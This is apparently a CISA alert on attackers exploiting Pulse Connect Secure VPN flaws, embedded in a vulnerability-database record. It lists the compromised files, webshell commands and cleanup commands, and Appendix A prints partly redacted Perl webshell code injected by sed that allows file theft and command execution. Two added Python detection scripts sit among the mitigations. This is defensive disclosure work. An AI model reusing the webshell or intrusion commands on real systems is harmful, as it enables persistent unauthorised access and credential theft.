Multiple Pulse Secure VPN vulnerabilities exploited in the wild](<https://blog.malwarebytes.com/malwarebytes-news/2021/04/take-action-multiple-pulse-secure-vpn-vulnerabilities-exploited-in-the-wild/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-04-21T18:12:15", "type": "malwarebytes", "title": "Take action! Multiple Pulse Secure VPN vulnerabilities exploited in the wild", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-22893"], "modified": "2021-04-21T18:12:15", "id": "MALWAREBYTES:60B52235DCBD12E98C7DB46F859F885C", "href": "https://blog.malwarebytes.com/malwarebytes-news/2021/04/take-action-multiple-pulse-secure-vpn-vulnerabilities-exploited-in-the-wild/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ics": [{"lastseen": "2023-09-23T07:15:37", "description": "### Summary\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) is aware of compromises affecting a number of U.S. 
government agencies, critical infrastructure entities, and other private sector organizations by a cyber threat actor\u2014or actors\u2014beginning in June 2020 or earlier related to vulnerabilities in certain Ivanti Pulse Connect Secure products. Since March 31, 2021, CISA and Ivanti have assisted multiple entities whose vulnerable Pulse Connect Secure products have been exploited by a cyber threat actor. These entities confirmed the malicious activity after running the [Pulse Secure Connect Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>). To gain initial access, the threat actor is leveraging multiple vulnerabilities, including [CVE-2019-11510](<https://vulners.com/cve/CVE-2019-11510>), [CVE-2020-8260](<https://vulners.com/cve/CVE-2020-8260>), [CVE-2020-8243](<https://vulners.com/cve/CVE-2020-8243>), and the newly disclosed [CVE-2021-22893](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/>). The threat actor is using this access to place webshells on the Pulse Connect Secure appliance for further access and persistence. The known webshells allow for a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence through patching.\n\n_**(Updated May 3, 2021)**:_ Ivanti has released [Security Advisory SA44784](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/SA44784/>) addressing [CVE-2021-22893](<https://vulners.com/cve/CVE-2021-22893>) and three additional newly disclosed CVEs\u2014CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. CISA strongly encourages organizations using Ivanti Pulse Connect Secure appliances to immediately run the [Pulse Secure Connect Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>), update to the [latest software version](<https://blog.pulsesecure.net/>), and investigate for malicious activity.\n\n_**(Updated May 27. 
2021):**_ CISA has updated this alert to include new threat actor techniques, tactics, and procedures (TTPs), indicators of compromise (IOCs), and updated mitigations. See Ivanti [KB44755 - Pulse Connect Secure (PCS) Integrity Assurance](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) for updated guidance to ensure the full integrity of your Pulse Connect Secure software.\n\n_**(Updated July 21, 2021):**_ Please see CISA's new Malware Analysis Reports in regards to adversary activity analyzed by CISA that were discovered on Pulse Connect Secure Devices.\n\n * [MAR-10333209-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202a>)\n * [MAR-10333243-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202b>)\n * [MAR-10334057-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202c>)\n * [MAR-10334057-2.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202d>)\n * [MAR-10334587-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202e>)\n * [MAR-10334587-2.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202f>)\n * [MAR-10335467-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202g>)\n * [MAR-10336161-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202h>)\n * [MAR-10336935-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202i>)\n * [MAR-10337580-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202j>)\n * [MAR-10337580-2.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202k>)\n * [MAR-10338401-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202l>)\n * [MAR-10338868-1.v1: Pulse Connect Secure](<https://us-cert.gov/ncas/analysis-reports/ar21-202m>)\n\n_**(Updated August 11, 2021):**_ Ivanti has released Pulse Connect Secure system software version 
9.1R12 to address multiple vulnerabilities that an attacker could exploit to take control of an affected system. CISA encourages organizations to review [Security Advisory SA44858](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44858>) and apply the necessary update.\n\n_**(Updated August 24, 2021):**_ Please see CISA's new Malware Analysis Reports for analysis of malicious activity discovered on Pulse Secure Connect devices.\n\n * [MAR-10336935-2.v1: Pulse Connect Secure](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236a>)\n * [MAR-10333243-3.v1: Pulse Connect Secure](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236b>)\n * [MAR-10338401-2.v1: Pulse Connect Secure](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236c>)\n * [MAR-10334057-3.v1: Pulse Connect Secure](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236d>)\n * [MAR-10339606-1.v1: Pulse Connect Secure](<https://us-cert.cisa.gov/ncas/analysis-reports/ar21-236e>)\n\nFor a downloadable list of indicators of compromise (IOCs), see AA21-110A.stix.\n\n### Technical Details\n\nOn March 31, 2021, Ivanti released the [Pulse Secure Connect Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) to check the integrity of Pulse Connect Secure appliances. Their technical bulletin states:\n\n_We are aware of reports that a limited number of customers have identified unusual activity on their Pulse Connect Secure (PCS) appliances. The investigation to date shows ongoing attempts to exploit vulnerabilities outlined in two security advisories that were patched in 2019 and 2020 to address previously known issues: Security Advisory SA44101 (CVE-2019-11510) and Security Advisory SA44601 (CVE-2020-8260). For more information visit KB44764 (Customer FAQ)._\n\n_**(Updated May 27, 2021)**:_ CISA has observed the cyber threat actor performing cleanup as demonstrated by the following:\n\n 1. 
The threat actor was observed timestomping the trojanized umount binary to match the timestamps of legitimate binaries, attempting to disguise the modifications; the touch command was used to modify the timestamp (https://attack.mitre.org/techniques/T1070/006/):\n\n/bin/touch /tmp/data/root/bin/umount -r /tmp/data/root/bin/cp\n\n2\\. The threat actor deleted files from temp directories using \"rm -f\": \n\n/bin/rm -f tmp1 \n/bin/rm -f tmp2\n\n3\\. Timestamps:\n\n**Note:** for context, loop 6 is the active partition and loop 8 is the rollback partition of the device.\n\n**Date** | Time (GMT) | Partition | Artifact | Activity \n---|---|---|---|--- \n4/13/21 | 5:15:33 | pulse-loop6 | /bin/umount | Content Modification Time \n4/20/21 | 19:09:14 | pulse-loop8 | /bin/umount | Metadata Modification Time \n4/20/21 | 19:09:14 | pulse-loop8 | /bin/umount | Content Modification Time \n4/20/21 | 19:18:49 | pulse-loop6 | /bin/umount | Metadata Modification Time \n4/23/21 | 16:14:48 | pulse-loop6 | /bin/umount | Last Access Time \n5/6/21 | 14:27:20 | pulse-loop8 | /bin/umount | Last Access Time \n4/20/21 | 19:08:01 | pulse-loop6 | /bin/touch | Last Access Time \n4/20/21 | 19:09:14 | pulse-loop8 | /bin/touch | Last Access Time \n \nSecurity firm FireEye has posted more information on their blog, including activity related to actor cleanup; see the FireEye blog post, [Re-Checking Your Pulse](<https://www.fireeye.com/blog/threat-research/2021/05/updates-on-chinese-apt-compromising-pulse-secure-vpn-devices.html>).\n\nThe suspected cyber threat actor modified several legitimate Pulse Secure files on the impacted Pulse Connect Secure appliances. 
The modifications implemented a variety of webshell functionality:

 * `DSUpgrade.pm` MD5: `4d5b410e1756072a701dfd3722951907`
   * Runs arbitrary commands passed to it
   * Copies malicious code into `Licenseserverproto.cgi`
 * `Licenseserverproto.cgi` MD5: `9b526db005ee8075912ca6572d69a5d6`
   * Copies malicious logic to the new files during the patching process, allowing for persistence
 * `Secid_canceltoken.cgi` MD5: `f2beca612db26d771fe6ed7a87f48a5a`
   * Runs arbitrary commands passed via HTTP requests
 * `compcheckresult.cgi` MD5: `ca0175d86049fa7c796ea06b413857a3`
   * Publicly-facing page to send arbitrary commands with the `ID` argument
 * `Login.cgi` MD5: `56e2a1566c7989612320f4ef1669e7d5`
   * Allows for credential harvesting of authenticated users
 * `Healthcheck.cgi` MD5: `8c291ad2d50f3845788bc11b2f603b4a`
   * Runs arbitrary commands passed via HTTP requests

Many of the threat actor’s early actions are logged in the Unauthenticated Requests Log in the following format; URIs have been redacted to minimize access to webshells that may still be active:

`Unauthenticated request url /dana-na/[redacted URI]?id=cat%20/home/webserver/htdocs/dana-na/[redacted URI] came from IP XX.XX.XX.XX.`

The threat actor then ran the commands listed in table 1 via the webshell.

_Table 1: Commands run via webshell_

**Time** | **Command**
---|---
2021-01-19T07:46:05.000+0000 | `pwd`
2021-01-19T07:46:24.000+0000 | `cat%20/home/webserver/htdocs/dana-na/[redacted]`
2021-01-19T08:10:13.000+0000 | `cat%20/home/webserver/htdocs/dana-na/l[redacted]`
2021-01-19T08:14:18.000+0000 | See Appendix A.
2021-01-19T08:15:11.000+0000 | `cat%20/home/webserver/htdocs/dana-na/[redacted]`
2021-01-19T08:15:49.000+0000 | `cat%20/home/webserver/htdocs/dana-na/[redacted]`
2021-01-19T09:03:05.000+0000 | `cat%20/home/webserver/htdocs/dana-na/[redacted]`
2021-01-19T09:04:47.000+0000 | `$mount`
2021-01-19T09:05:13.000+0000 | `/bin/mount%20-o%20remount,rw%20/dev/root%20/`
2021-01-19T09:07:10.000+0000 | `$mount`

The cyber threat actor is using exploited devices located on residential IP space—including publicly facing Network Attached Storage (NAS) devices and small home business routers from multiple vendors—to proxy their connection to interact with the webshells they placed on these devices. These devices, which the threat actor is using to proxy the connection, correlate with the country of the victim and allow the actor activity to blend in with normal telework user activity. **Note:** these devices are not related to the Pulse vulnerabilities, but rather are where the malicious internet traffic passes through.

Details about lateral movement and post-exploitation are still unknown at this time. CISA will update this alert as this information becomes available.

### (Updated April 30, 2021): Detections

#### _(Updated April 30, 2021): Impossible Travel_

During the course of analysis, it is possible that a network defender may be able to reveal illegitimate connections from users that are masquerading as legitimate users from different geolocations. CISA has noted IPs associated with malicious webshell interaction from a threat actor—associated with a single username—in both the authenticated and the unauthenticated logs at the same time. The geolocation for the two IP addresses was sufficiently far apart that impossible travel calculations could detect the threat actor IP address.

#### _(Updated April 30, 2021): TLS Fingerprinting_

Transport Layer Security (TLS) fingerprinting may also be useful in identifying malicious activity.
CISA has noted re-use of various JA3 hashes, including JA3 hashes that align with Chrome, Firefox, and others. Caution should be taken when using TLS fingerprinting because the majority of the JA3 hashes observed in connection with Pulse Connect Secure exploitation were not unique to malicious activity. The same JA3 hashes—and the software they characterize—are often used for benign activity, vulnerability scanning, etc. Overlap in JA3 hashes cannot be considered a high-fidelity indicator of malicious activity, let alone successful exploitation. Connections made via JA3 must be corroborated with other data points.

 * A common observation is that the TLS connections frequently exclude the Server Name Indication (SNI) extension, which is relatively rare in most environments where users connect to Domain Name System (DNS) host names (but is commonly observed in scanning). It is believed this is an artifact of attackers browsing directly to IP addresses instead of host names.
 * The JA3 hashes in table 2 below have been observed in connection with Pulse Secure exploitation. **Note:** there may be many User-Agents associated with a given JA3 (often due to User-Agent spoofing), and the prevalence of a given JA3 necessarily differs by environment. The prevalence column of table 2 refers to how often the specific JA3 hash was observed in the dataset that was being analyzed. Some hashes are rarely observed in the dataset, and the information is provided for context only. Analytical conclusions should not be made solely based on this reporting. The prevalence of a JA3 hash observed in an environment would need to be further evaluated.

_Table 2: JA3 MD5 hashes and associated prevalence/user-agent_

JA3 Hash | User-Agent | Prevalence
---|---|---
227ab2ae6ed6abcc249e8a873a033144 | Firefox (~68-71) | very rare
30017f6f809155387cbcf95be6e7225d | (UA header frequently not set) | rare
3cbc88eabdac9af71445f9040a6cf46c | Chrome (~50-57) | very rare
53829d58e2631a372bb4de1be2cbecca | Chrome (~51-81) | rare
714cdf6e462870e2b85d251a3b22064b | Firefox (~65-68) | very rare
86cb13d6bbb3ac96b78b408bcfc18794 | Python-requests, many others | common (but rare when used with Pulse Secure)
8f6747b71d1003df1b7e3e8232b1a7e3 | Chrome (~89) | rare
916e458922ae9a1bab6b1154689c7de7 | Firefox (~60-86) | very rare
a29d0d294a6236b5bf0ec2573dd4f02f | Firefox (~77-87), Chrome (~78-90), others | very rare
af26ba5e85475b634275141e6ed3dc54 | Python-requests, many others | rare
b592adaa596bb72a5c1ccdbecae52e3f | Chrome (~79-90) | rare
c12f54a3f91dc7bafd92cb59fe009a35 | Office, many others | very rare

### Mitigations

**(_Updated May 3, 2021_)** CISA strongly urges organizations using Pulse Secure devices to immediately:

 * Review the [Pulse Secure Connect Integrity Tool Quick Start Guide](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) and [Customer FAQs](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44764>)
 * Run the [Pulse Secure Connect Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>).
   * The tool requires a reboot.
   * If virtualized, take a snapshot before running.
   * If the appliance is physical, consider the consequences of rebooting and running the tool, and contact Ivanti for assistance or questions.
 * **(_Updated May 3, 2021_)** ~~Continue to run the tool daily until the XML mitigations have been implemented or the patch has been deployed.~~ **Note:** the Pulse Secure team released [Security Advisory SA44784](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/SA44784/>), which addresses [CVE-2021-22893](<https://vulners.com/cve/CVE-2021-22893>), CVE-2021-22984, CVE-2021-22899, and CVE-2021-22900 with patches.
 * ~~Implement the mitigations released by the vendor. According to Ivanti Pulse Secure, the interim XML configurations listed in the "Workaround" section of [SA44784 - 2021-04: Out-of-Cycle Advisory: Pulse Connect Secure RCE Vulnerability (CVE-2021-22893)](<https://kb.pulsesecure.net/pkb_mobile#article/l:en_US/SA44784/s>) provide significant protection against threat actor activity.~~
 * **(_Updated May 3, 2021_)** Update to the latest software version.~~, per the process outlined on Ivanti Pulse Secure’s website which contains security enhancements.~~
 * _**(Updated May 27, 2021)**_ Using the Pulse Secure Integrity Checker. The Integrity Checker Tool (ICT) helps system owners understand if their Pulse Secure Connect device has been compromised. While the tool is accurate, there are several nuances to its effective use.
   * The ICT detects evidence of adversary cleanup only on the current, running version of PCS.
   * It may be necessary to roll back the current PCS version to have a valid run of the ICT.
   * During the upgrade process, the active version becomes a rollback partition.
   * Only one rollback partition exists on a device, as the rollback partition is replaced on each update.
   * Therefore, if an entity has updated their PCS device without running the correct version of the ICT (as outlined in Appendix B), anomalous activity will not be detected.

If the Integrity Checker Tool finds mismatched or unauthorized files, CISA urges organizations to:

 * Contact CISA to report your findings (see the Contact Information section below).
 * Contact [Ivanti Pulse Secure](<https://support.pulsesecure.net/support/support-contacts/>) for assistance in capturing forensic information.
 * Review the “Unauthenticated Web Requests” log for evidence of exploitation, if enabled.
 * Change all passwords associated with accounts passing through the Pulse Secure environment (including user accounts, service accounts, administrative accounts, and any accounts that could be modified by any account described above; all of these accounts should be assumed to be compromised). **Note:** Unless an exhaustive password reset occurs, factory resetting a Pulse Connect Secure appliance (see Step 3 below) will only remove malicious code from the device, and may not remove the threat actor from the environment. The threat actor may use the credentials harvested to regain access even after the appliance is fully patched.
 * Review logs for any unauthorized authentications originating from the Pulse Connect Secure appliance IP address or the DHCP lease range of the Pulse Connect Secure appliance's VPN lease pool.
 * _**(Updated May 27, 2021)**_ **Note:** adversary activity may not be easily identifiable on your network, as it may appear as normal user traffic. If a device has been compromised, entities should take all precautions as if the adversary has intruded past the device into your network, and take steps to ensure there are no further signs of an intrusion into networks. These steps include:
   * Look for unauthorized applications and scheduled tasks in environments.
   * Ensure no new administrators were created.
   * Ensure non-privileged users were not added to privileged groups.
   * Scrutinize and monitor all accounts with domain administrator privileges.
   * Monitor domain administrator accounts to ensure they are only accessing the part of the network they are authorized to access.
   * Check all accounts to ensure they have the proper level of privileges and have not been altered, such as by increased privileges.
   * Remove any remote access programs not approved by the organization.
   * Carefully inspect scheduled tasks for scripts or executables that may allow a threat actor to connect to an environment.

In addition to the recommendations above, organizations that find evidence of malicious, suspicious, or anomalous activity or files should consider the guidance in [KB44764 - Customer FAQ: PCS Security Integrity Tool Enhancements](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44764>), which includes:

After preservation, you can remediate your Pulse Connect Secure appliance by:

 1. Disabling the external-facing interface.
 2. Saving the system and user config.
 3. Performing a factory reset via the Serial Console. **Note:** For more information refer to [KB22964](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB22964/?kA1j0000000FjFj>) (How to reset a PCS device to the factory default setting via the serial console).
 4. Updating the appliance to the newest version.
 5. Re-importing the saved config.
 6. Re-enabling the external interface.
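The alert's mitigations ask defenders to review the “Unauthenticated Web Requests” log, and the Technical Details section shows the `Unauthenticated request url ... came from IP ...` line format in which the actor's webshell commands were recorded (table 1). The following Python is an added example, not code from CISA, Ivanti or Pulse Secure: it parses constructed lines in that format, URL-decodes the `id` query argument, and flags values that look like shell commands rather than opaque identifiers. The sample paths and IP addresses are constructed placeholders, and the `COMMAND_RE` heuristic is an assumption of this example, not a vendor detection rule.

```python
"""Triage of Pulse Connect Secure "Unauthenticated request url" log lines.

Added example (not CISA's, Ivanti's or Pulse Secure's code).  It parses the
line format quoted in the alert, URL-decodes the `id` query argument and
flags values that look like shell commands rather than opaque identifiers.
"""
import re
from urllib.parse import parse_qs, urlsplit

LINE_RE = re.compile(
    r"Unauthenticated request url (?P<url>\S+) came from IP "
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})"
)

# Heuristic (an assumption of this example): a legitimate id is an opaque
# token, while commands carry whitespace, paths, shell metacharacters or
# variable references.
COMMAND_RE = re.compile(r"[\s/;|`&$]")

# Constructed sample lines: paths and IPs are placeholders from the RFC 5737
# documentation ranges; the `id` values mirror the commands in table 1.
SAMPLE_LOG = [
    "Unauthenticated request url /dana-na/example.cgi?id=pwd came from IP 192.0.2.10.",
    "Unauthenticated request url /dana-na/example.cgi?id=cat%20/home/webserver/htdocs/dana-na/x.cgi came from IP 192.0.2.10.",
    "Unauthenticated request url /dana-na/example.cgi?id=%24mount came from IP 192.0.2.10.",
    "Unauthenticated request url /dana-na/example.cgi?id=/bin/mount%20-o%20remount,rw%20/dev/root%20/ came from IP 192.0.2.10.",
    "Unauthenticated request url /dana-na/auth/welcome.cgi?id=1f2e3d came from IP 198.51.100.7.",
    "some unrelated log line that must be ignored",
]


def parse_line(line):
    """Return {"ip", "path", "params"} for a matching line, else None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    # parse_qs percent-decodes values, so `cat%20/home/...` becomes `cat /home/...`
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return {"ip": m.group("ip"), "path": parts.path, "params": params}


def looks_like_command(value):
    """True when the decoded id contains characters an opaque token never has."""
    return bool(COMMAND_RE.search(value))


def suspicious_requests(lines):
    """Return (ip, path, decoded id) for every line whose id resembles a command."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None or "id" not in rec["params"]:
            continue
        if looks_like_command(rec["params"]["id"]):
            hits.append((rec["ip"], rec["path"], rec["params"]["id"]))
    return hits


if __name__ == "__main__":
    for ip, path, cmd in suspicious_requests(SAMPLE_LOG):
        print(f"{ip} {path} id={cmd!r}")
```

The heuristic deliberately errs toward precision: a bare single-word command such as `pwd` (the first entry in table 1) carries none of the marker characters and is not flagged, so in practice pair this with an allowlist of the id formats your own CGI endpoints legitimately accept and treat any non-conforming value as worth a look.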
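The Impossible Travel detection described in the Detections section above rests on one calculation: the same username seen from two source IPs whose geolocations are too far apart to be reached in the elapsed time. The block below is an added example, not code from the alert, showing that calculation over constructed login events. The usernames, timestamps, IP addresses (RFC 5737 documentation ranges) and the `GEO` coordinate table are constructed stand-ins; in a real deployment the coordinates would come from a GeoIP lookup, and the `MAX_SPEED_KMH` and `min_distance_km` thresholds are assumptions to tune for your environment.

```python
"""Impossible-travel check over VPN / webshell access events.

Added example, not part of the CISA alert.  Consecutive events for the same
user are compared; if the great-circle distance between the two source IPs
divided by the elapsed time exceeds a plausible travel speed, the pair is
reported.
"""
from dataclasses import dataclass
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

# Constructed sample events: (username, ISO-8601 UTC timestamp, source IP).
# Both the authenticated and unauthenticated request logs can feed this.
SAMPLE_EVENTS = [
    ("jdoe", "2021-01-19T09:03:05+00:00", "198.51.100.23"),
    ("jdoe", "2021-01-19T09:04:47+00:00", "203.0.113.77"),
    ("asmith", "2021-01-19T09:05:13+00:00", "198.51.100.45"),
    ("asmith", "2021-01-19T10:15:00+00:00", "198.51.100.46"),
]

# Constructed geolocation table (latitude, longitude in degrees); a real
# deployment would query a GeoIP database instead (assumption).
GEO = {
    "198.51.100.23": (38.9, -77.0),   # placeholder: US east coast
    "203.0.113.77": (35.7, 139.7),    # placeholder: Tokyo area
    "198.51.100.45": (38.9, -77.0),
    "198.51.100.46": (39.0, -77.1),   # placeholder: same metro area
}

MAX_SPEED_KMH = 1000.0  # faster than a commercial flight: not reachable


def haversine_km(p, q):
    """Great-circle distance in km between two (lat, lon) points in degrees."""
    lat1, lon1 = map(radians, p)
    lat2, lon2 = map(radians, q)
    a = sin((lat2 - lat1) / 2) ** 2 + cos(lat1) * cos(lat2) * sin((lon2 - lon1) / 2) ** 2
    return 2 * 6371.0 * asin(sqrt(a))


@dataclass
class Finding:
    user: str
    first_ip: str
    second_ip: str
    distance_km: float
    elapsed_hours: float
    speed_kmh: float


def impossible_travel(events, geo, max_speed_kmh=MAX_SPEED_KMH, min_distance_km=100.0):
    """Return a Finding for each consecutive pair of events by one user whose
    implied speed exceeds max_speed_kmh.  Pairs closer than min_distance_km
    are ignored so GeoIP jitter inside one city never fires."""
    parsed = sorted(
        ((user, datetime.fromisoformat(ts), ip) for user, ts, ip in events),
        key=lambda e: (e[0], e[1]),
    )
    findings = []
    for (u1, t1, ip1), (u2, t2, ip2) in zip(parsed, parsed[1:]):
        if u1 != u2 or ip1 == ip2 or ip1 not in geo or ip2 not in geo:
            continue
        dist = haversine_km(geo[ip1], geo[ip2])
        if dist < min_distance_km:
            continue
        hours = (t2 - t1).total_seconds() / 3600.0
        speed = float("inf") if hours == 0 else dist / hours
        if speed > max_speed_kmh:
            findings.append(Finding(u1, ip1, ip2, dist, hours, speed))
    return findings


if __name__ == "__main__":
    for f in impossible_travel(SAMPLE_EVENTS, GEO):
        print(f"{f.user}: {f.first_ip} -> {f.second_ip}, {f.distance_km:.0f} km "
              f"in {f.elapsed_hours * 60:.1f} min ({f.speed_kmh:.0f} km/h)")
```

The alert's caveat applies here as much as to JA3: a hit means the two connections cannot both be the same person in the same place, not that either IP is malicious on its own. Residential proxies in the victim's own country, which the alert notes the actor used, will not trip this check, so treat it as one corroborating signal alongside the webshell request log and ICT results.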


CISA recommends performing checks to ensure any infection is remediated, even if the workstation or host has been reimaged. These checks should include running the [Pulse Secure Connect Integrity Tool](<https://kb.pulsesecure.net/articles/Pulse_Secure_Article/KB44755>) again after remediation has taken place.

CISA would like to thank Ivanti for their contributions to this Alert.

### Contact Information

CISA encourages recipients of this report to contribute any additional information that they may have related to this threat. For any questions related to this report, please contact CISA at

 * 1-888-282-0870 (From outside the United States: +1-703-235-8832)
 * [central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>) (UNCLASS)
 * us-cert@dhs.sgov.gov (SIPRNET)
 * us-cert@dhs.ic.gov (JWICS)

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on the CISA/US-CERT homepage at <http://www.us-cert.cisa.gov/>.

### Appendix A: Large sed Command Found In Unauthenticated Logs

`Unauthenticated request url 
/dana-na/[redacted]?id=sed%20-i%20%22/main();/cuse%20MIME::Base64;use%20Crypt::RC4;my%20[redacted];sub%20r{my%20\\$n=\\$_[0];my%20\\$rs;for%20(my%20\\$i=0;\\$i%3C\\$n;\\$i++){my%20\\$n1=int(rand(256));\\$rs.=chr(\\$n1);}return%20\\$rs;}sub%20a{my%20\\$st=\\$_[0];my%20\\$k=r([redacted]);my%20\\$en%20=%20RC4(%20\\$k.\\$ph,%20\\$st);return%20encode_base64(\\$k.\\$en);}sub%20b{my%20\\$s=%20decode_base64(\\$_[0]);%20my%20\\$l=length(\\$s);my%20\\$k=%20substr(\\$s,0,[redacted]);my%20\\$en=substr(\\$s,[redacted],\\$l-[redacted]);my%20\\$de%20=%20RC4(%20\\$k.\\$ph,%20\\$en%20);return%20\\$de;}sub%20c{my%20\\$fi=CGI::param(%27img%27);my%20\\$FN=b(\\$fi);my%20\\$fd;print%20\\%22Content-type:%20application/x-download\\\\n\\%22;open(*FILE,%20\\%22%3C\\$FN\\%22%20);while(%3CFILE%3E){\\$fd=\\$fd.\\$_;}close(*FILE);print%20\\%22Content-Disposition:%20attachment;%20filename=tmp\\\\n\\\\n\\%22;print%20a(\\$fd);}sub%20d{print%20\\%22Cache-Control:%20no-cache\\\\n\\%22;print%20\\%22Content-type:%20text/html\\\\n\\\\n\\%22;my%20\\$fi%20=%20CGI::param(%27cert%27);\\$fi=b(\\$fi);my%20\\$pa=CGI::param(%27md5%27);\\$pa=b(\\$pa);open%20(*outfile,%20\\%22%3E\\$pa\\%22);print%20outfile%20\\$fi;close%20(*outfile);}sub%20e{print%20\\%22Cache-Control:%20no-cache\\\\n\\%22;print%20\\%22Content-type:%20image/gif\\\\n\\\\n\\%22;my%20\\$na=CGI::param(%27name%27);\\$na=b(\\$na);my%20\\$rt;if%20(!\\$na%20or%20\\$na%20eq%20\\%22cd\\%22)%20{\\$rt=\\%22Error%20404\\%22;}else%20{my%20\\$ot=\\%22/tmp/1\\%22;system(\\%22\\$na%20%3E/tmp/1%202%3E&1\\%22);open(*cmd_result,\\%22%3C\\$ot\\%22);while(%3Ccmd_result%3E){\\$rt=\\$rt.\\$_;}close(*cmd_result);unlink%20\\$ot}%20%20print%20a(\\$rt);}sub%20f{if(CGI::param(%27cert%27)){d();}elsif(CGI::param(%27img%27)%20and%20CGI::param(%27name%27)){c();}elsif(CGI::param(%27name%27)%20and%20CGI::param(%27img%27)%20eq%20\\%22\\%22){e();}else{%20%20%20&main();}}if%20(\\$ENV{%27REQUEST_METHOD%27}%20eq%20\\%22POST\\%22){%20%20f();}else{&main();%20}%22%20/home/webserver/htdocs
/dana-na/[redacted] came from IP XX.XX.XX.XX`

### Appendix B: ICT Releases

_Table 3: ICT Releases – releases are cumulative_

**Release Package** | **Supported Versions (n+1 always supports nth versions)** | Release Date
---|---|---
package-integrity-checker-11951.1.pkg | 8.3R7.1 (build 65025); 9.1R7 (build 6567); 9.1R8 (build 7453); 9.1R8.1 (build 7851); 9.1R8.2 (build 8511); 9.1R9 (build 9189); 9.1R9.1 (build 9701); 9.1R10 (build 10119); 9.1R11 (build 11161); 9.1R11.1 (build 11915) | 3/31/2021 (ICTv1 released to public on 3/31/2021) *Initial build
package-integrity-checker-12255.1.pkg | 9.1R8.4 (build 12177); 9.1R9.2 (build 12181); 9.1R10.2 (build 12179); 9.1R11.3 (build 12173); 9.1R1 (build 1505); 9.1R2 (build 2331); 9.1R3 (build 3535); 9.1R4 (build 4763); 9.1R4.1 (build 4967); 9.1R4.2 (build 5035); 9.1R4.3 (build 5185); 9.1R5 (build 5459); 9.1R6 (build 5801) | 4/17/2021 (ICTv2 released to public on 4/18/2021)
package-integrity-checker-12363.1.pkg | 9.1R11.3:HF1 (build 12235); 9.1R9.1HF1 (build 10625.1); 9.1R11.1HF1 (build 12049.1); 9.1R11.4 (build 12319) | 5/3/2021 (ICTv3 released to public on 5/3/2021)

### References

[FireEye blog: Check Your Pulse: Suspected APT Actors Leverage Authentication Bypass Techniques and Pulse Secure Zero-Day](<https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html>)

[CERT/CC Vulnerability Note VU#213092 Pulse Connect Secure vulnerable to authentication bypass](<https://www.kb.cert.org/vuls/id/213092>)

### Revisions

 * April 20, 2021: Initial version
 * April 21, 2021: Added CERT/CC Vulnerability Note to References
 * April 26, 2021: Added IOC STIX File
 * April 30, 2021: Replaced IOC STIX File; Added new Detection Section
 * May 3, 2021: Added Ivanti Security Update Information
